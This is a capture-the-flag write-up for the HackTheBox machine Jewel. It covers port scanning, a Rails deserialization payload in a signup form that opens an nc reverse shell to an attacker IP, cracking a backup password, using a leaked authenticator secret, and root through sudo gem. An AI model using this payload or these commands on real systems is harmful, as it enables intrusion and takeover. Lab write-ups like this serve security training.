HackTheBox Jewel Writeup
Methodology
- Nmap Scan
- Enumerating the web service
- found the Ruby version in the Gemfile and an exploit for it.
- server-side template injection exploitation
- found the password of user bill in /var/backups
- found the secret token of Google Authenticator
- using sudo -l leads us to the final part!
Nmap Scan
As always, I’ll do an nmap scan to find out which services are running on this machine, and I found these services:
- 22 for the SSH service.
- 8000 for HTTP (Apache with gitweb)
- 8080 for HTTP (nginx)
nmap -Pn -sC -sV -oN scan.txt 10.10.10.211
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 fd:80:8b:0c:73:93:d6:30:dc:ec:83:55:7c:9f:5d:12 (RSA)
| 256 61:99:05:76:54:07:92:ef:ee:34:cf:b7:3e:8a:05:c6 (ECDSA)
|_ 256 7c:6d:39:ca:e7:e8:9c:53:65:f7:e2:7e:c7:17:2d:c3 (ED25519)
8000/tcp open http Apache httpd 2.4.38
|_http-generator: gitweb/2.20.1 git/2.20.1
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.38 (Debian)
| http-title: jewel.htb Git
|_Requested resource was http://jewel.htb:8000/gitweb/
8080/tcp open http nginx 1.14.2 (Phusion Passenger 6.0.6)
|_http-server-header: nginx/1.14.2 + Phusion Passenger 6.0.6
|_http-title: BL0G!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Web Service Enumeration
- Let’s add jewel.htb to our /etc/hosts and start enumerating the web service.
I’ve found a basic blog on port 8080.
Let’s sign up and look deeper.
Here I’m logged in.
Let’s check port 8000 now.
It’s a .git directory, so let’s check whether there is anything useful for us.
Click on .git, then on the initial commit, and you will find some Gem files, so let’s check them.
In the Gemfile I found the Ruby version.
And there’s an exploit for this version:
- Link: Ruby On Rails
Now we need to register a new user and put the payload in the username field to get a reverse shell.
Let’s register a new user, click on profile, click edit, click save, and intercept the request with Burp Suite.
Put this payload in the username field, changing the IP address to your own.
payload: %04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E%40instanceo%3A%08ERB%08%3A%09%40srcI%22U%60rm+%2Ftmp%2Ff%3Bmkfifo%20%2ftmp%2ff%3bcat%20%2ftmp%2ff%7c%2fbin%2fsh+-i+2%3e%261%7cnc+10.10.XX.XX+9001+%3e%2Ftmp%2ff%60%06%3A%06ET%3A%0E%40filenameI%22%061%06%3B%09T%3A%0C%40linenoi%06%3A%0C%40method%3A%0Bresult%3A%09%40varI%22%0C%40result%06%3B%09T%3A%10%40deprecatorIu%3A%1FActiveSupport%3A%3ADeprecation%00%06%3B%09T
Send the request twice and then refresh the web page.
Don’t forget to start an nc listener first.
- Nice! We got a reverse shell now.
Privilege Escalation
After some enumeration I found the password of the user bill in /var/backups.
- Let’s crack the password now.
sudo john --wordlist=/usr/share/wordlists/rockyou.txt pass
When you try sudo -l you will see that it requests a verification code.
There is a hidden file in bill’s home directory which contains the secret token for Google Authenticator.
So we need to add the Google Authenticator (GAuth) add-on to Google Chrome and put the secret token in it, and it will generate the OTP for us.
- And here’s the OTP.
Let’s check “sudo -l” again.
In this part I spent a day trying to identify my mistake but didn’t find anything, until my friend told me this machine is all about sync.
- Let’s check the time and the date.
The box’s date and time differ from my local date and time, so we need to change ours to match.
- Let’s check again.
Nice! We will use the gem command to get root; let’s open GTFOBins now.
sudo gem open -e "/bin/sh -c /bin/sh" rdoc
Rooted!
Thanks For Reading
Cheers!